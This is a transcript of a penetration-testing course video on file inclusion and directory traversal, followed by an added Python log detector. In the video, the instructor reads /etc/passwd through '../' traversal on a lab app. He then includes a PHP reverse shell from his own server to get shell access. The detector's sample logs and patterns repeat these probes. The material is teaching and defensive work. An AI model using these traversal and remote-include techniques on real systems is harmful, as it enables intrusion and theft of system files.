Time
14 hours 43 minutes
Difficulty
Advanced
CEU/CPE
15

Video Transcription

00:00
Hello, everybody, and welcome to session number 20 of the course:
00:06
local file inclusion, remote file inclusion and directory traversal. My name is Alejandro Guinea and I'll be the instructor for today's session.
00:15
The learning objectives of this session are to understand the concept behind this attack and apply the techniques to implement this attack. So let's get down to business, shall we?
00:27
First let me start by clearing this up,
00:32
and by telling you what these attacks are, why they exist, what they can do, and some basic information first,
00:44
before we can actually perform the attack. So the file inclusion vulnerability allows attackers to include a file, usually exploiting some dynamic file inclusion mechanism implemented in a target application. The vulnerability happens when
01:03
the programmer,
01:07
whoever created the tool or the program, never validated the inputs, meaning that they might be calling dynamically the name of, maybe, a web page. They're just
01:26
changing the name of what they're calling in the code, and then they're just attaching or appending an extension. For example, I know that some programmers leave
01:38
names for the web pages based on countries, for example. So they just
01:47
call that name dynamically, meaning that they just call, for example, the name of the variable and then attach that .php at the end. So
02:00
we have remote file inclusion, also known as RFI,
02:04
which is the process of including remote files through the same thing I just explained. This means that
02:13
again, when the programmer leaves that variable which is changing dynamically, you can actually input a URL pointing maybe to your attacking machine, and maybe send
02:30
or have on that URL
02:34
PHP code expecting to execute maybe a reverse shell, for example. Since remote file inclusion happens when the path passed to include statements is not properly sanitized or checked,
02:52
in a black-box testing approach, meaning that you don't know much about the application, we should look for scripts
03:00
that take file names, for example. Let's say, let me just open nano here for something that will not be saved, something
03:09
just to show you. For example, if you have the code of the application, you can actually search for something like this. As you can see, I'm declaring a variable here, and then I'm just calling the name of the variable, meaning that maybe I'm actually inputting
03:29
something like
03:30
the name of the country or the name of the page. But as you can see, it is actually being included dynamically. Maybe this comes with a name like, I don't know, this_page.php. But since some of them actually allow this in the URL,
03:49
you can actually change the name, or maybe
03:53
put a URL here to your malicious site, and since it is just appending the .php, you can have it ready, maybe waiting in a .txt file, something like that. But let me just show you here, performing the attack, by just putting in something nonsense.
04:12
I forgot to mention, let me just cover the basics here again.
04:20
For example, the code we had,
04:25
in the code we had, let's say that
04:30
we want to include the URL. So, for example, maybe the URL is something like this: localhost/page.php. And this file is actually what we're calling dynamically here.
04:46
So we put a URL in here
04:48
and this will be executed as PHP code. So this is how dangerous this could be. And we also have local file inclusion. So this is something like: okay, we don't want to use a remote source, we don't actually want to do something remotely. We know that we already uploaded a backdoor, maybe
05:05
to the victim's machine. So we just want to
05:10
actually use a directory traversal, which is what I'm doing right now. You are putting `../../../../`, and you're actually going backwards to where you actually want to be.
05:25
So maybe I know that there's something in the /var directory, for example.
05:32
And I put something like my_page.txt, and this will be executed in here.
05:40
It's PHP code, and that will happen. And I know what you're saying: okay, this is local file inclusion, because we're actually calling this, but we're using directory traversal to actually
05:54
go from one path to the other. So what's the difference? We already know what the difference is between remote file inclusion and local file inclusion, but what's the difference between local file inclusion and directory traversal? Well, basically, the difference is that
06:13
with local file inclusion,
06:16
the resource is loaded and executed. I guess that's the main difference: it is executed in the context of the application. So in this case, it will be executed in the context of, I don't know, Apache, WebSphere, or whatever web server you have. In directory traversal,
06:36
which is
06:38
loading and reading the file. For example, in this case, let's say that this is actually not being executed. Maybe this line of code is not in here,
06:49
or maybe it is, but it's not being executed. So I can actually go, okay, this will not be executed, so I just want to print some information, or I just want to load, see and read some information. Or maybe I will go to the /etc/
07:08
shadow file, for example, or the passwd file.
07:11
So I can actually print it because I don't want to execute it, or I can execute it. That's the main difference between local file inclusion and directory traversal. But enough with the theory. Let's get to practice
07:28
first. Let me go to this web app. I already have the bee-box machine turned on.
07:35
Let me just go here: Remote & Local File Inclusion. As you can see, the URL is fine so far. But what happens if I set the language to English? As you can see, I'm actually...
07:47
what happens if I put it in French?
07:51
Okay. As you can see, it is dynamically changing in here.
07:58
Okay, let's go back to English again.
08:01
And as you can see, it's dynamically changing. That's the point. So, as we remember from
08:07
the example I gave you, you can actually put that `../../../../` to actually test that. So let's do that. Let's see if we can actually print
08:22
the passwd file. I know, most of the time we don't actually get to print the shadow file, because you have to be root to do that, and most of the time web applications aren't, unless the system administrator, I don't know,
08:41
what was he thinking,
08:43
runs the web page as an administrator or root. I have seen it happen. So
08:48
don't give up hope. So we just hit Enter and we can see all the content of the passwd file.
08:56
So this is how the directory traversal can look, but this is just reading information. So what will happen if I actually want to get a reverse shell from this?
09:13
Remember that PHP code is something that is executed on the server side and not on the client side.
09:20
So if we actually have one
09:24
reverse shell on the URL, a PHP reverse shell. Remember, we saw that a couple of videos ago, the web shells or reverse shells that can actually be executed through PHP. We can actually have one ready in our URL, in our web server.
09:43
And instead of printing the passwd file, we can actually put the URL to that site.
09:50
So let's give it a try first. Remember that Kali comes with several web shells. Let me just show you here. You can go to this directory.
10:05
And as you can see, we have ASPX for Microsoft, and other formats, Perl. Remember that in the previous video we talked about reverse shells, and we said that we can actually have reverse shells come from Perl, Python,
10:24
Bash and PHP.
10:26
In this case, we're interested in PHP. So let's just
10:31
bring that.
10:33
And we have several reverse shells in here. Let's use this one. And remember, we have to put it in our web root because we want to redirect that execution back to our attacking machine, the Kali machine itself. So
10:52
let's just copy that. Let me just copy it with a basic command here.
11:01
So we already copied it. We just went to
11:05
modify it so it can go back to our listener, and we're putting that in here. And why do we put it in a .txt? Because at the end, that is what remote file inclusion does most of the time:
11:24
they're changing the name, but they're not changing the extension.
11:31
It could happen that they change the extension too. But most of the time the code is just changing the name. So we want to put it in a .txt file so that the .php is attached at the end of our code.
11:43
So here we put the... remember, this is a reverse shell, so we have to put the IP
11:50
of the Kali machine and port 1234. That's fine.
11:54
And close, save it. And the .60 host is already waiting for a connection. So let me just start my Apache server.
12:07
Okay.
12:13
So I have it ready. Now what happens if I go to my local URL?
12:18
Let's see,
12:20
the .60 host.
12:24
It's already in there. As you can see, it has the right IP and is waiting for this. So right now I just have to copy this
12:31
and actually put it in instead. And remember that we put that
12:37
directory traversal,
12:41
pointing here, or the regular URL path, so we can load this. So now we put the URL and have it ready, waiting for a connection. So let me just start a reverse shell listener.
12:56
netcat.
13:01
It's listening. And if I hit Enter here, it will
13:07
go and
13:11
include whatever it is including.
13:15
So we're not getting anything back, so let's see what happened, actually.
13:20
What is happening here?
13:24
We're actually going to
13:28
language, and we're actually leaving... let's just go here and replace this.
13:33
Now we know that it's actually going to the URL localhost. Oh, OK, that's a problem. This will not work: it will understand localhost as its own localhost, so it's not executing it from my machine. So let me just put the IP in here.
13:54
Okay,
13:54
going to my URL again. I have my listener ready.
14:00
Just hit Enter. And it says something is coming up in the background. And there you go, we have a reverse shell. Okay, `whoami`:
14:11
www-data
14:13
and I'm in the Linux bee-box. I'm gaining a connection from that machine. So that's how dangerous and malicious local file inclusion and remote file inclusion are. By the way, local file inclusion can achieve the exact same goal. Maybe
14:30
we already uploaded to, maybe, an FTP with an anonymous login, or maybe an SMB with also an anonymous login or guest login enabled.
14:41
We already uploaded
14:45
a PHP reverse shell, and we don't have the need to actually go to an external URL. We can just load it, as we did with the passwd file: we just load the PHP we uploaded, and that should be fine. Remember, some firewalls have
15:05
outbound and inbound connection restrictions. So maybe fetching that from the URL, and getting a reverse shell or getting something to execute from an external URL, is not the best option to go with. In that scenario,
15:22
you can achieve the exact same thing with local file inclusion.
15:30
What is the difference between local file inclusion and directory traversal? Well, the main difference is that in local file inclusion you're actually executing something in the context of the application, and in directory traversal you're just reading it.
15:46
Can we actually get remote control through this attack? Yeah, we definitely can. I mean, we just saw an example of that.
15:54
In this video we learned the concepts of this attack, and we implemented some techniques to execute this attack. And we also saw how malicious this attack can be.
16:04
Supplemental materials: again, nothing changed in this matter. The Hacker Playbook, an amazing book. And again, every possible source on Google and YouTube.
16:19
In the next video we will cover password attacks. So that's it for today, folks. I hope you enjoyed the video and talk to you soon.
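As an added, defender-side illustration that is not part of the course video: a small Python detector that flags, in Apache-style access log lines, the two probes the instructor demonstrated against the `language` parameter, the `../` traversal to /etc/passwd and the parameter pointing at an external URL. The log lines, IP addresses and the `/index.php` path are constructed sample data, not taken from the lab.

```python
"""Added example: flag LFI/RFI probes in Apache-style access logs (constructed data)."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")             # "../" or "..\" segments
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)  # value is itself a URL (RFI)
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow")
# Minimal Apache common-log-format matcher: client ip, request target, status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Percent-decode until stable, so encoded dots and slashes are seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_param(value):
    """Return 'rfi', 'lfi' or None for one query-parameter value."""
    v = decode_fully(value)
    if REMOTE_SCHEME.match(v):
        return "rfi"
    if TRAVERSAL.search(v) or any(f in v.lower() for f in SENSITIVE_FILES):
        return "lfi"
    return None

def scan_log(lines):
    """Return (client ip, kind, parameter, decoded value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than crash
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_param(value)
            if kind:
                findings.append((m.group("ip"), kind, name, decode_fully(value)))
    return findings

# Constructed sample: a benign request, then the traversal and remote-URL probes from the video
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=english HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?language=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?language=http://203.0.113.10/shell.txt HTTP/1.1" 200 77',
]
```

Running `scan_log(SAMPLE_LOG)` reports the three probes from the same client and ignores the benign request; the same classifier applied at request time, with an allowlist of known language names, is the fix for the dynamic include the video describes.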

Up Next

Offensive Penetration Testing

This is a deep course about penetration testing. In this course, you’ll learn from basic to the most advanced and modern techniques to find vulnerabilities through information gathering, create and/or use exploits and be able to escalate privileges in order to test your information systems defenses.

Instructed By

Alejandro Guinea
CERT Regional Director
Instructor